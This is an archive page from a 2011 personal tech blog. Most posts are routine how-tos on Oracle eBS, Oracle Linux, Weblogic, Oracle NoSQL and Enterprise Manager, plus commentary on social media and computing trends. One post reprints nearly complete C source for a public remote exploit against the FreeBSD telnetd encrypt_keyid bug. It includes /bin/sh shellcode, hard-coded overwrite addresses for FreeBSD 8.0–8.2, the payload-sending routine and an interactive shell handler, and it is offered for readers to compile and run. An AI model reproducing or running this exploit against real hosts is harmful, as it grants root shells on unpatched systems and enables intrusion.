Thursday, December 29, 2011

Oracle eBS change username

Amar Padhi is running a showing a nice explanation on how to change the username of a user in Oracle eBS. I encountered this option due to the fact that I was looking into some requests from a customer which involves the mass change of a userbase in Oracle eBS. This particular customer is in need to change a large set of its usernames to be able to be compliant with internal rules and regulations concerning usernames.

The initial idea was to create new accounts and end-date the old accounts in Oracle eBS. However, it turns out that you can rename them by making use of the change_user_name function which can be found in the fnd_user_pkg package in the database.

The example Amar is using on his weblog is the example below:
                               x_old_user_name => 'AMARKP', 
                               x_new_user_name => 'AMAR.PADHI'

Without much effort you could create a script to mass update all the users that are in need of an update. You do most likely would like to add some reporting, logging and notification to this script to make it robust however the use of fnd_user_pkg.change_user_name will play a central role.

Oracle Linux and wine

For all people who like to run windows applications on your Linux workstation. Most of you would do a simple apt-get or yum command however if you are running a Enterprise Linux version like the Oracle Linux you might need to do some more things to get things working. if you execute a "yum install wine" on your Oracle Linux distribution you will not end up with a successful install of wine.

To be able to install wine on Enterprise linux you will have to make use of EPEL (Extra Packages for Enterprise Linux). You can find more information on EPEL on the fedore website.

"Extra Packages for Enterprise Linux (or EPEL) is a Fedora Special Interest Group that creates, maintains, and manages a high quality set of additional packages for Enterprise Linux, including, but not limited to, Red Hat Enterprise Linux (RHEL), CentOS and Scientific Linux (SL).

EPEL packages are usually based on their Fedora counterparts and will never conflict with or replace packages in the base Enterprise Linux distributions. EPEL uses much of the same infrastructure as Fedora, including buildsystem, bugzilla instance, updates manager, mirror manager and more.

You will have to install the EPEL rpm, update the yum repository list and then install wine. Below is a example of the steps needed. This might change depending on the version of Oracle Linux and your processor architecture however based upon the below you will have enough to get you started;
rpm -Uvh
  yum repolist
  yum install wine

Wednesday, December 28, 2011

Telnetd encrypt_keyid exploit script

On the 23th of this month the guys at FreeBSD released a security alert on a bug found in the FreeBSD telnet daemon. It turns out that with some very simple tricking you are able to execute commands remotely as the user who is running the daemon (which is is many cases the user root). This is a very serious security issue and it possibly reminds some of you to some very old exploits years ago on AIX and Solaris where you also could become almost every user you would like by exploiting a telnet daemon.

Another issue with this telnet exploit is that this version of the telnet daemon is used, forked, re-forked and embedded in operating systems, software distributions and appliances which potentially are all vulnerable at this moment. Exploit scripts are available for the metasploit framework and the sourcecode of an exploit script can be found below;

 *            telnetd-encrypt_keyid.c
 *  Mon Dec 26 20:37:05 CET 2011
 *  Copyright  2011  Jaime Penalba Estebanez (NighterMan)
 * -
 *  Credits to batchdrake as always
 *            ______      __      ________
 *          /  __  /     /_/     /  _____/
 *         /  /_/ /______________\  \_____________
 *        /  ___ / __  / / __  /  \  \/ _ \/  __/
 *       /  /   / /_/ / / / / /___/  /  __/  /__
 *  ____/__/____\__,_/_/_/ /_/______/\___/\____/____
 * Usage:
 * $ gcc exploit.c -o exploit
 * $ ./exploit 23 1
#define MAXKEYLEN 64-1
struct key_info
  unsigned char keyid[MAXKEYLEN];
  unsigned char keylen[4];
  unsigned char dir[4];
  unsigned char modep[4];
  unsigned char getcrypt[4];
static unsigned char shellcode[] =
   "\x31\xc0"                      // xor          %eax,%eax
   "\x50"                          // push         %eax
   "\xb0\x17"                      // mov          $0x17,%al
   "\x50"                          // push         %eax
   "\xcd\x80"                      // int          $0x80
   "\x50"                          // push         %eax
   "\x68\x6e\x2f\x73\x68"          // push         $0x68732f6e
   "\x68\x2f\x2f\x62\x69"          // push         $0x69622f2f
   "\x89\xe3"                      // mov          %esp,%ebx
   "\x50"                          // push         %eax
   "\x54"                          // push         %esp
   "\x53"                          // push         %ebx
   "\x50"                          // push         %eax
   "\xb0\x3b"                      // mov          $0x3b,%al
   "\xcd\x80";                     // int          $0x80
static unsigned char tnet_init_enc[] =
static unsigned char tnet_option_enc_keyid[] = "\xff\xfa\x26\x07";
static unsigned char tnet_end_suboption[] = "\xff\xf0";
 * shell(): semi-interactive shell hack
static void shell(int fd)
    fd_set  fds;
    char    tmp[128];
    int n;
    /* check uid */
    write(fd, "id\n", 3);
    /* semi-interactive shell */
    for (;;) {
        FD_SET(fd, &fds);
        FD_SET(0, &fds);
        if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
        /* read from fd and write to stdout */
        if (FD_ISSET(fd, &fds)) {
            if ((n = read(fd, tmp, sizeof(tmp))) < 0) {
                fprintf(stderr, "Goodbye...\n");
            if (write(1, tmp, n) < 0) {
        /* read from stdin and write to fd */
        if (FD_ISSET(0, &fds)) {
            if ((n = read(0, tmp, sizeof(tmp))) < 0) {
            if (write(fd, tmp, n) < 0) {
static int open_connection(in_addr_t dip, int dport)
   int pconn;
   struct sockaddr_in cdata;
   struct timeval timeout;
   /* timeout.tv_sec  = _opts.timeout; */
   timeout.tv_sec  = 8;
   timeout.tv_usec = 0;
   /* Set socket options and create it */
   cdata.sin_addr.s_addr = dip;
   cdata.sin_port = htons(dport);
   cdata.sin_family = AF_INET;
   pconn = socket(AF_INET, SOCK_STREAM, 0);
   if( pconn < 0 )
      printf("Socket error: %i\n", pconn);
      printf("Err message: %s\n", strerror(errno));
   /* Set socket timeout */
   if ( setsockopt(pconn, SOL_SOCKET, SO_RCVTIMEO,
           (void *)&timeout, sizeof(struct timeval)) != 0)
      perror("setsockopt SO_RCVTIMEO: ");
   /* Set socket options */
   if ( setsockopt(pconn, SOL_SOCKET, SO_SNDTIMEO,
           (void *)&timeout, sizeof(struct timeval)) != 0)
      perror("setsockopt SO_SNDTIMEO: ");
   /* Make connection */
   if (connect(pconn,(struct sockaddr *) &cdata, sizeof(cdata)) != 0)
      return -1;
   return pconn;
static void usage(char *arg)
    printf("Telnetd encrypt_keyid exploit for FreeBSD\n");
    printf("NighterMan \n\n");
    printf("Usage: %s [ip] [port] [target]\n", arg);
    printf("Available Targets:\n");
    printf(" - 1: FreeBSD 8.0 & 8.1\n");
    printf(" - 2: FreeBSD 8.2\n\n");
int main(int argc, char *argv[])
    /* Payload Size */
    int psize = (sizeof(struct key_info) +
                sizeof(tnet_option_enc_keyid) +
    struct key_info bad_struct;
    unsigned char payload[psize];
    unsigned char readbuf[256];
    int ret;
    int conn;
    int offset = 0;
    if ( argc != 4) {
        return -1;
    /* Fill the structure */
    memset(&bad_struct, 0x90, sizeof(struct key_info));
    memcpy(&bad_struct.keyid[20], shellcode, sizeof(shellcode));
    memcpy(bad_struct.keylen,   "DEAD", 4);
    memcpy(bad_struct.dir,      "BEEF", 4);
    memcpy(bad_struct.modep,    "\x6c\x6f\x05\x08", 4); /* Readable address */
    /* Shellcode address (function pointer overwrite) */
    switch (atoi(argv[3])) {
        case 1:
            memcpy(bad_struct.getcrypt, "\xa6\xee\x05\x08", 4);
        case 2:
            memcpy(bad_struct.getcrypt, "\xed\xee\x05\x08", 4);
            printf("Bad target\n");
            return -1;
    /* Prepare the payload with the overflow */
    memcpy(payload, tnet_option_enc_keyid, sizeof(tnet_option_enc_keyid));
    offset += sizeof(tnet_option_enc_keyid);
    memcpy(&payload[offset], &bad_struct, sizeof(bad_struct));
    offset += sizeof(bad_struct);
    memcpy(&payload[offset], tnet_end_suboption, sizeof(tnet_end_suboption));
    /* Open the connection */
    conn = open_connection(inet_addr(argv[1]), atoi(argv[2]));
    if (conn == -1) {
        printf("Error connecting: %i\n", errno);
        return -1;
    /* Read initial server request */
    ret = read(conn, readbuf, 256);
    printf("[<] Succes reading intial server request %i bytes\n", ret);
    /* Send encryption and IV */
    ret = write(conn, tnet_init_enc, sizeof(tnet_init_enc));
    if (ret != sizeof(tnet_init_enc)) {
        printf("Error sending init encryption: %i\n", ret);
        return -1;
    printf("[>] Telnet initial encryption mode and IV sent\n");
    /* Read response */
    ret = read(conn, readbuf, 256);
    printf("[<] Server response: %i bytes read\n", ret);
    /* Send the first payload with the overflow */
    ret = write(conn, payload, psize);
    if (ret != psize) {
        printf("Error sending payload first time\n");
        return -1;
    printf("[>] First payload to overwrite function pointer sent\n");
    /* Read Response */
    ret = read(conn, readbuf, 256);
    printf("[<] Server response: %i bytes read\n", ret);
    /* Send the payload again to tigger the function overwrite */
    ret = write(conn, payload, psize);
    if (ret != psize) {
        printf("Error sending payload second time\n");
        return -1;
    printf("[>] Second payload to triger the function pointer\n");
    /* Start the semi interactive shell */
    printf("[*] got shell?\n");
    return 0;

Tuesday, December 27, 2011

Memcached explaind by James Phillips

A very interesting video with James Phillips who is the Chief Strategy Officer and cofounder from NorthScale. Northscale provides elastic data infrastructure software and is closely tied with the guys from couchbase and are the developed on the memcached project.

Membase was developed by several leaders of the memcached project, who had founded a company, NorthScale, expressly to meet the need for an key-value database that enjoyed all the simplicity, speed, and scalability of memcached, but also provided the storage, persistence and querying capabilities of a database. The original membase source code was contributed by NorthScale, and project co-sponsors Zynga and NHN to a new project on in June 2010.

In computing, memcached is a general-purpose distributed memory caching system that was originally developed by Danga Interactive for LiveJournal, but is now used by many other sites. It is often used to speed up dynamic database-driven websites by caching data and objects in RAM to reduce the number of times an external data source (such as a database or API) must be read. Memcached runs on Unix, Linux, Windows and MacOSX and is distributed under a permissive free software license.
Memcached's APIs provide a giant hash table distributed across multiple machines. When the table is full, subsequent inserts cause older data to be purged in least recently used (LRU) order. Applications using Memcached typically layer requests and additions into RAM before falling back on a slower backing store, such as a database.

The system is used by sites including YouTube, Reddit, Zynga, Facebook, Orange, and Twitter. Heroku (now part of Salesforce) offers a Couchbase-managed memcached add-on service as part of their platform as a service. Google App Engine, AppScale and Amazon Web Services also offer a memcached service through an API. Memcached is also supported by some popular CMSs such as Drupal, Joomla, and WordPress.

implementing membase and the memcached API's can help you speed up your website enormously. Investigating the options in this field when you are building a high traffic website is very important and can mean the difference between success or failure in my opinion. memcache can be seen as one of the future building blocks and should be taken serious when you develop large scale web applications.

Thursday, December 22, 2011

A doodle or visual thinking

I do love whiteboards, I love scratchpads, I do love to doodle and I love to work with photoshop. even though I do love to do this I am not a very good artist as some people are and when I draw a tree everyone starts wondering what it is. However, using it to explain things is a very usefull tools. Standing in front of a whiteboard with a couple of people and blueprint a new enterprise IT landscape on a whiteboard is the best way to take the first steps in my opinion. The main reason why whiteboard vendors sell whiteboards I guess.

One other thing I do love, most of the times, is the infographics, Information graphics or infographics are graphic visual representations of information, data or knowledge. These graphics present complex information quickly and clearly. It is a real nice way to show you what people mean and explain complex systems very quickly. making them is an art in my opinion.

I always thought that just doodle something and draw your thinking on a whiteboard was something we humans are just natural to do... now I just learned that we have a very cool, fancy and hip word for it and, as it go's without saying, a way of thinking and very expensive management trainings for. It is called visual thinking; "Picture thinking, visual thinking , visual/spatial learning or right brained learning is the common phenomenon of thinking through visual processing using the part of the brain that is emotional and creative to organize information in an intuitive and simultaneous way."
I personally think it is just a cool way to display your thoughts and get things done. And if you are really really good you can make something like what Steven Johnson has done below. Making a cool video on "WHERE GOOD IDEAS COME FROM";

Wednesday, December 21, 2011

Oracle NoSQL port settings

Installing and running an Oracle NoSQL server is in no comparison with installing and running a traditional Oracle Database. Download and execute one command and you are up and running with your first node in your NoSQL cluster. (the very simple approach)

If you have not been looking at on what port is running what you might want to be able to find out where your management server is running and which port is used for your database. To find the ports it is running at you can look in the log file of your NoSQL server located at the kvroot directory and which is named in most cases snaboot_0.log

What you would be looking for a the following kind of lines;
Creating a Registry on port
Starting Web service on port 5001

The first line shows you that you are running the Oracle NoSQL database at port 5000 and the second line indicates that the web service (admin console ) is running on port 5001

When taking a closer look at the logfile you might have noticed a hint to where you can change this. You have to look for a line similar to this one:
12-21-11 12:38:15:409 CET INFO [snaService] Starting, configuration file: ./kvroot/config.xml

If you check the config.xml you will notice  what you can change. This will be the main file to edit when you want to change the settings of your Oracle NoSQL node.

<config version="1">
  <component name="bootstrapParams" type="bootstrapParams">
    <property name="adminHttpPort" value="5001" type="INT"/>
    <property name="hostingAdmin" value="true" type="BOOLEAN"/>
    <property name="storeName" value="kvstore" type="STRING"/>
    <property name="storageNodeId" value="1" type="INT"/>
    <property name="hostname" value="" type="STRING"/>
    <property name="haHostname" value="" type="STRING"/>
    <property name="rootDir" value="./kvroot" type="STRING"/>
    <property name="haPortRange" value="5010,5020" type="STRING"/>
    <property name="registryPort" value="5000" type="INT"/>

Friday, December 16, 2011

Google Zeitgeist 2011

When you state Zeitgeist most people will think about Zeitgeist as in the Zeitgeist movie movement and the zeitgeist movie from . A less know fact is that zeitgeist (spirit of the time) is also something which is used by Google to refer to what the world has been searching on the past year(s).

"What mattered in 2011? Zeitgeist sorted billions of Google searches to capture the year's 10 fastest-rising global queries and the rest of the spirit of 2011."

As the year is coming to an end lots of radio stations, television channels and such do make a recap of the past year. Google has done so on the and has done so via the video below. See the world via the search requests from google:

Thursday, December 15, 2011

Hadoop explained by Mike Olson

Hadoop is a Apache project aimed to build a framework a framework for running applications on large cluster built of commodity hardware. The Hadoop framework transparently provides applications both reliability and data motion. Hadoop implements a computational paradigm named Map/Reduce, where the application is divided into many small fragments of work, each of which may be executed or re-executed on any node in the cluster. In addition, it provides a distributed file system (HDFS) that stores data on the compute nodes, providing very high aggregate bandwidth across the cluster. Both MapReduce and the Hadoop Distributed File System are designed so that node failures are automatically handled by the framework.

When we look at where the future of computing and the future of data we can see Hadoop on a very strategic location on the roadmap and within the overall framework. Hadoop is one of the ultimate building blocks in the framework which is responsible for parallelism within this framework and can be seen as one of the main engines for handling big-data.

In the below video Mike Olson is explaining some parts of the future framework of computing and explains Hadoop and some other parts in depth. Mike Olson is a the CEO of Cloudera, Cloudera is one of the leading companies who are investing in the Hadoop community.

Wednesday, December 07, 2011

FlipBoard on the iPhone

The moment I almost made my decision it is time for a new phone Mike McCue comes out with a new version of FlipBoard. For all of you who have not been working with FlipBoard already, Flipboard is a new and very quick way to read information like it was in a newspaper. For none iPad users the issue was that it was only available on the iPad. Now Mike McCue, CEO at FlipBoard announced the iPhone version.

This is making my decision to move from iPhone to Android a little harder. My phone is currently not able to keep up with the processing demand of the apps that are released and due to this I am in "need" of a faster phone. Looking at Android it made a good impression and convinced me that I would switch from iPhone to Android. The release of FlipBoard makes this however again something to consider.

Flipboard is a social magazine application and company founded in 2010 by Mike McCue and Evan Doll, based out of Palo Alto, California in the United States for Apple's iPad tablet computer. The application is designed to collect the content of social networks and other websites and present them in magazine format on the iPad. The application is designed specifically for the iPad's touch screen and allows users to "flip" through their social networking feeds and feeds from websites that have partnered with Flipboard.

Tuesday, December 06, 2011

social media hell

Every now and then I do think I will no longer be able to keep up with all the social media channels I use. Issue is that we do not have a good and correct working single integration to broadcast your message. Some applications are able to maintain some of the social media networks however I have not encounterd yet a single application that will help me keep track of all of them. If anyone has a good solution to this..... it would be a blessing in my opinion.

I do use primarily the following media social media networks:

Sunday, December 04, 2011

Klout social media monitoring

 A lot of people do wonder what their true reach is when they post things online. Is the message they broadcast really seen by other people and who are those people. You can make use of website statistics when you operate a blog or website however measuring what your social network influence is can be a little harder. For this you can use advanced corporate solutions used by companies to monitor their campaigns however if you do not have a huge budget you can also try to use Klout. Klout is a free service which will help you to analyse who is listening to your social media broadcasts and what type of social media person you are. When you look closely to the results and have a clear goal this can be a great tool help you with a social media strategy if you do not have a hughe budget.

Currently, they actively measure five networks: Twitter, Facebook, LinkedIn, Foursquare and Google+. These are just some of the actions Klout uses when determining your Klout Score:
    Twitter: Retweets and Mentions
    Facebook: Comments, Wall-Posts, Likes
    Google+: Comments, Reshares, +1
    LinkedIn: Comments, Likes
    Foursquare: Tips – Todo’s and Tips – Done

You can also connect Facebook pages, YouTube, Instagram, Tumblr, Blogger,, and Flickr accounts. These networks do not yet impact your overall Score yet. Before a network can be fully integrated into the public score it must be rigorously analyzed, normalized, and tested by our science team. Once that is ready and tested, we release it and the new network will count towards your Score. The Klout Score is also measured on a 90 day time decay so by adding these networks to you are able to benefit from a longer window of data when the score goes live.

You can find out more about how Klout is working by following the blog from Klout on

Thursday, November 24, 2011

The future of computing is parallelism

predicting the future is always a tricky thing to do and many this is especially the case when you try to predict the future of computing as this is a field in which a lot of people do have an opinion. However, looking at where we currently stand and what the limits of physics are (as currently known) we can do some modest predictions.

As a statement: "the future of computing is parallelism".

If we look at the current speed of processors (per core) we see that the speed (frequency) is leveling out. Reason for this is that if you increase the frequency you will more leakage in your transistors which are on your chip. leakage is recorded to the outside world as heat. So if we where able to run the chips on a higher frequency we will see that the heat will increase up till a level which cannot be cooled in a "normal" way and against normal prices.

What chip manufacturers are doing to cope with this is issue is to build multi-core processors. Having multiple cores running on a acceptable frequency which is providing enough computational power to the system while keeping the heat within an acceptable range is the way forward. We can already see good examples of this in the AMD liano and the nvidia fermi (image below) many-core processors.

The new breed of processors will be many-core processors holding large number of cores. This will require new ways of developing software and programs. With many-core processors you will have the option (and the need) to run your programs over multiple cores to make full use of your hardware. To be able to do so one will have to consider parallelism when developing code. Developing parallel processes is another way of thinking which is currently not adopted by the majority of the developers simply because they can do without. However, as we are getting more and more data (bigdata), processes and computations are getting more complex and users are not willing to wait very long developers will have to think about parallel programming very soon.

You have some languages which are specially designd to cope with many-core processors, one example is CUDA which is developed by nvidia. You do however not need a special language, python is very well able to cope with it and java is also able to just like C for example. Issue is that developers have to start thinking about it and need to get familiar with it (in my opinion).

So what is the future of computing, parallel computing and many-core processes. Thom Dunning is explaining it in more detail in his "future of high performance computing" lecture for the National Center for Supercomputing Applications which you can watch below:

Saturday, November 19, 2011

99 cent fraud prevention

In an attempt to stop identity fraud AT&T no longer gives you the new iPhone for free when you purchase a 2 year contract with them. According to a AT&T employee this is to prevent criminals who use stolen identities to purchase phones for free. His Story was published on macrumors.

The 99 cent needs to be charged against your credit card which is an extra hurdle for criminals to take before they can use a stolen identity to purchase the phone.

Identity theft is not only used in the illegal purchasing of phones, it is seen as one of the fastest growing forms of criminality. The Wikipedia description of identity fraud is the following:

Identity theft is a form of stealing another person's identity in which someone pretends to be someone else by assuming that person's identity, typically in order to access resources or obtain credit and other benefits in that person's name. The victim of identity theft (here meaning the person whose identity has been assumed by the identity thief) can suffer adverse consequences if he or she is held accountable for the perpetrator's actions. Organizations and individuals who are duped or defrauded by the identity thief can also suffer adverse consequences and losses, and to that extent are also victims.

Friday, November 11, 2011

Capgemini Oracle Run Cloud Platform

Capgemini is recently offering a Oracle Run and Host Cloud hosting solution. A complete in house developed and hosted cloud computing platform specifically for Oracle Products. For all people who are wondering what I have been up to the past couple of months, I have been busy growing an idea from only a scribble on a notepad on a rainy Sunday to a full working cloud computing platform.

Capgemini is now able to provide full Cloud Hosting and Cloud computing solutions specifically for Oracle Products however also to all Linux based applications. The service is operated from our core Oracle Run and Host team in the Netherlands and is running in Capgemini owned datacenters.

You will see this popping up in more and more Capgemini Oracle related offerings in the upcoming times as we believe this is a great added value to our customers. You can find the official brochure of Oracle run below.

Oracle Run and Host cloudcomputing

As we are working close with the Capgemini Oracle Application Lifecycle Services team and our Capgemini cloud computing platform is the technological foundation of this they have included our solution in their youtube movie.

Oracle Weblogic installation guide for linux

Please find a quick and dirty guide on how to install a Oracle Weblogic 11G release 1 server (version 10.3.5) on a Oracle Linux 6 distribution.

Even though this is just a quick and dirty installation the first thing we will do however is make sure that we have some users and groups created to prevent the Weblogic server from running under the root user. For this we will be using the operating system user oracle and the operating system group oinstall.

For creating the correct user and groups and bind them together you can make use of the standard Linux commands to do so.

groupadd oinstall
groupadd dba
useradd oracle -g oinstall -G dba
passwd oracle

The above commands will create the groups, create the user and will enable you to define a password for the user. How you can create a directory /u01 and change the owner to the user oracle and the group to oinstall. This will enable you to install the software as the user oracle under /u01. Running the Weblogic server not as root is a best practice you should follow, running processes as the root user, especially when they connect to the outside world, is a security risk in itself.

Lets assume you have download the installation file from the oracle website to the /u01 directory you can start the installation from the command line. When you have configured X you should be presented with a graphical installer which will guide you during the installer. For systems not having X configured a command line installer will do the same.

The graphical installer will present you the following steps:

The welcome screen, nothing much to do at this screen. It is only telling you what you are about to install which can be handy if you are not sure which version you have downloaded. In our case it is stating which looks to be ok.

This screen provides you the option to select if you want to create a new middleware home or use a existing one. As this is a fresh installation of Weblogic on a fresh installation of Oracle Linux we will select the option to create a new middleware home. What you like to check is the middleware home directory. You like to make sure this is not the Oracle home directory, you would like to use the /u01 location.

“New” oracle products provide you the option to connect them to Oracle metalink (My Oracle Support). For this you have to enter your metalink account information. By doing so you register your installation and you can be advised on patches and updates for your installation. Doing so is a choice and before making this decision you should consider if this is a wanted behavior. When making this decision do keep security in the back of your mind.

A common question during a installation, do you want to do a typical installation or a custom installation. As we like to control most of the install we will pick the customer installation in this example.

Choose Products and components allows you to select which components you like to install. This can be quite useful if you like to do a lean installation with only the minimal needed set of components.

You will need a JDK, this screen will enable you to select if you want to install the SUN JDK and oracle JRockit. We will install both in this installation

Based upon the Oracle Middleware Home Directory a Weblogic, Oracle Coherence and Eclipse pack location will be created. You can select other locations if you do have a need for this however it is common practice to keep this as suggested by Oracle.

The installation summary will show you what you have selected and give you the option to go back if you spot a mistake.

This all will result in the installer performing the installation for you. This gives you a great moment to get some coffee. (depending on the speed of your system a quick coffee possibly)

A completed installation will result in this screen where you can select your next step. If you select the “start Weblogic Server 10.3.5 Samples Domain” you will notice that the Weblogic server will start in the background and that your browser will open.

Below you can see a small screenshot of the weblogic page you have just started.

Sunday, October 30, 2011

Unable to find the sources of your current Linux kernel

When you are installing Oracle Linux (or other distributions) within a Oracle VirtualBox virtualization environment you do want to install the Guest Additions most likely. Depending on what you have included in your installation you might be missing some packages which result in failure of the installation of the Guest Additions.

Last “version” of this issue I encountered was represented by this error message:

The headers for the current running kernel were not found. 
If the following module compilation fails then this could be the reason.

Building the main Guest Additions module!
(Look at /var/log/vboxadd-install.log to find out what went wrong)

When you take a look in the mentioned log located in /var/log/vboxadd-install.log I encountered the following line:

Failed to install using DKMS, attempting to install without
/tmp/vbox.0/Makefile.include.header:94: *** Error: unable to find the sources of your current Linux kernel. Specify KERN_DIR= and run Make again.  Stop.

This indicates that you do not have all the packages you need to rebuild some of the kernel parts. To resolve this you have to install the following GCC, kernel-dev and kernel-headers. You can do so by executing the following yum command:

yum install gcc kernel-devel kernel-headers

That is under the impression that you have already configured your yum repository to your enterprise yum repository or to the public yum server available online at Oracle. If you have not configured yum you can read in this blogpost how you should configure your yum settings.

Secondly you have to make sure you have a variable names KERN_DIR pointing to your sources kernel. In my case this is /usr/src/kernerls/2.6.32-131.0.15.el6.i686

Thursday, October 27, 2011

Oracle Enterprises Manager Topology Adobe SVG

Oracle Enterprise manager provides you the option to see the topolgy of a service. When you open this page you can however encounter a page which states the following;

You are seeing this page because you do not have the Adobe SVG Plugin installed. To view the visual topology, please download the Adobe SVG Plugin 3.0.x

This is the case when you open for example the topology page from a service as shown in the screenshot below:

Strange thing is that Adobe has stated they will discontinue SVG viewer as from January 2009. You can however still download the installer from the adobe site. You can also go to the plugin website from Microsoft to download a SVG plugin.

SVG stands for Scalable Vector Graphics and is a text-based graphics language that describes images with vector shapes, text, and embedded raster graphics.

SVG files are compact and provide high-quality graphics on the Web, in print, and on resource-limited handeld devices. In addition, SVG supports scripting and animation, so is ideal for interactive, data-driven, personalized graphics.

SVG is a royalty-free vendor-neutral open standard developed under the W3C (World Wide Web Consortium) Process.

After installing this plugin you will be able to view the topology pages in Oracle Enterprise Manager without any issue.

Monday, October 24, 2011

Oracle Enterprise Manager edit target properties

Oracle Enterprise Manager is designed to help you monitor and maintain servers and systems in large scale enterprise environments and not so much to be used within a small company with only a couple of database servers. You can use it however if you look at the way the products is build you see that the intention is to deploy and use in large scale.  When you are talking about maintaining large number of systems for multiple departments or even for multiple customers if you host and maintain systems for a large number of customers. 

When you use it in such an environment you would like to store more information about the system than you get from a discovery. If you go to “target setup” and select Properties you can add more information to the target.  
For example who to contact, which department and very important, what kind of server / service is this? Development, Production, Test,...

Oracle Enterprise Manager change dashboard

Oracle Enterprise Manager is a great solution to get a 360 view on your complete IT landscape and to enable the IT staff from you company to act fast and become more efficient. Even though you have a enormous set of options within Oracle Enterprise Manager and with the move to cloud management they make a very good case for the tool there are still some points. First and foremost is that the price is on the high side. If you already have invested for years in optimizing your IT the costs for the final optimization in the form of Oracle Enterprise Manager can come as a shock as the benefits will not be that extreme. Second thing is that you can see possibly to much.

For a tool that provide you a complete view on your hardware, operating systems, databases and applications from one single tool that might sound a little strange however it is true. Without a good and well thought setup plan your administrators will be to overwhelmed to be efficient. It is of vital importance that you think about who can see what and who can do what. In essence everyone within your own organization should be able to see everything however their main dashboards should be tuned to show them the most important and critical information when they open Oracle Enterprise Manager. For example a UNIX administrator will not have to see all the database information on his first screen, what this person needs is the information of all the servers running. By default you get a somewhat overwhelming screen as shown below;

You can change this by navigating to “setup” > “My Preferences” > “Select my Home”. By default you have 7 options in this screen where you can pick the most appropriate for your daily job. You have the following options:

Summary: Summary page provides a complete and consolidated view of targets monitored by Enterprise Manager.

Databases: Monitor any database instance or RAC database right on the homepage. Check the load, memory consumption and any issues related to the target.

Incidents: Incident console helps users track, diagnose and resolve issues identified across targets by Enterprise Manager.

SOA: An enterprise level view for all the SOA targets with the Alerts, Policy Violations, and critical metrics. It provides details of SOA Composites, BPEL 10g Process, OSB Services and Web Services.

Middleware: Monitor all middleware targets in your environment from this page.

Composite Application: An enterprise level view of Composite Applications. It provides list of all Composite Applications created with their member details along with status information.

Service Request: The Service Request page provides access to the Service Request creation and management features in My Oracle Support, Oracle's customer support portal.

Selecting one of those will change the default first page to a more appropriate page for your day to day job.

Friday, October 21, 2011

Multiple online identities

Chris Pool is the founder of 4chan and Canvas and during his talk at the web 2.0 summit sponsored by O’Reilly he gives the below talk on online identity.

During his talk he is stating some very good points to which I can relate. One of his main issues the current way online identities are managed today by for example facebook and google is that you can only have one single identity which needs to be linked to the person who you are in real life. Having a connection between your online identity and your offline identity is not a bad thing at its self however, it is within the human nature to have multiple identities. The average human will have multiple identities and will be able to tell them apart from each other without having a mental issue. As an example the identity which identifies you as a person at the work will be most likely something else as how people identify you at your sports club. Your family will know you as yet another person.

When sharing with your facebook identity all people will be able to read what you share, with this facebook is a real one identity network. Google has launched google+ where you can use circles where you group people. You can share with everyone or with only the people in a certain circle. This is already a more segregated way of sharing and provides you to have multiple channels of expression under one single identity.

What Chris is promoting in his talk at the web 2.0 summit is that you should also have the option to post under an alias (handle). Just to make sure that you can explore all kinds of different things you do not need to inform other people about (or explicitly do not want other people to know). For example what do your coworkers need to know about your interest in ancient fire making techniques, maybe this is something private you only want to discuss online using your handle makefire1600 while you do not want your makefire friends to mingle with the people from you daily job.

There are all kinds of things to say for having the option to be able to multiple id’s online and it would be great if you can connect them all to one username/password protected main identity without showing who you really are. If companies like Google and facebook will ever go to this kind of account setup is a very big question and I do not think they will start supporting it however, it is a interesting question and theory to play with and I do think Chris has a point.

Excel hell

At all the companies I have worked for, as own staff or as a consultant for a certain period of time I have encountered the lover for Microsoft excel or spreadsheet applications of another vendor. Reason for this is that people can quickly create and work with spreadsheets, use them to build analysis, create calculations and more. The ease of building it is great, almost all employees do have a copy of Excel on their laptop and most people do understand it. The phrase “excel management” is not an unknown term to most companies as it looks like managers especially love excel to look at reporting. When companies or departments need some more than Excel they tend to look at solutions like Microsoft Access which is more a database like application and is tending to some more “complex” needs a department might have.

Issue with especially excel and excel files is that as soon as you put it out in the wild, you mail it to other people to use it, you do no longer have control over it. For example if you create a calculation model for something into excel and send it to other people in the company you do not have the option to track who is using it and if you discover something that you need to change there is no way of knowing all people will use the latest version. A similar issue is that when you like to keep track of the status of things in a excel sheet, for example the progress of work, you have no way of knowing and assuring that all people use the same version and that everything is captured.

In many cases the file is placed on a centralized storage location, for example a department shared network location, issue is that people tend to download it and place it on their own laptop. For example the project progress, people working remote will update the sheet on their local drive and when they have a network connection again try to upload / override the version on the network drive. I imagine everyone working on such projects will have an example of versions that where overwriting someone else his work.

To cope with this issue it might be more easy to have a centralized web application that holds all the features that excel is offering you and enable you to make more use of collaboration functions. Some options are available currently. You can have a look at the Microsoft 365 online office applications, Google is providing Google Docs which holds a spreadsheet application or you can have a look at Oracle APEX (Oracle Application Express). Oracle APEX is not comparable with the Microsoft 365 or Google doc solutions which are more online spreadsheet solutions, APEX is more a quick solution to build applications with a spreadsheet background.

APEX provides you the options to quickly build a web application and even convert existing excel spreadsheets into such an application. All user interface parts are provided out of the box as well as user management and such things. With APEX you can have an application up and running in no time by only using your browser and without any programming needed. In my opinion it is not a hundred percent solution however for quickly building spreadsheet avoiding solutions or small applications for a departmental level it is a great application. In the video below you can see what Oracle has to say about their own product. Big advantages are that that you can install it even on your own laptop to play with it and experiment with it, it is easy to use and build upon and the price…. You can use it for free under certain rules.

Tuesday, September 27, 2011

Oracle Fusion Stack

 Oracle Fusion, a term that is buzzing around already for years and getting a more mythical sound to it every year it is discussed. Fusion should be the answer to a lot of questions and it is coming, it is coming soon. Even though Oracle is promoting it and has been releasing a lot of buzz around it some people are getting tired and are getting confused. The expectation was that Oracle would provide a complete new stack in one go and that it would branded in the same way as we have seen with 11G and 12G. I have been asked a couple of times by people within the company to talk to them on what the future of Oracle will be from a technology point of view so I decided it would be a smart move to start blogging about it and provide all of you an insight into what I have found and what I think will be the future of Oracle from this point of view.

However, Oracle is releasing bits and parts of the Fusion stack, from a marketing purpose you can see this as smart, a buzz is created, or you can see this as a weakness, they start talking about something which is lacking shape at the moment they started talking about it. What a lot of people do not realize is that there is a lot Fusion out there, released possibly below the radar or people do not get the picture that it is part of the new Fusion stack. The below diagram holds a high level design of the Oracle eBS Fusion stack coming up from the database up till the functional modules. The picture is coming from the Oracle manual Oracle Fusion Applications Administrator’s Guide 11g Release 1 ( launched as draft in April 2011. Even though it is confidential officially some people have released it to the public. Thanks to the people at we are able to take a peak in the draft version, you can have a look at the manual at and you can read it as a embedded document from at the end of this blogpost.

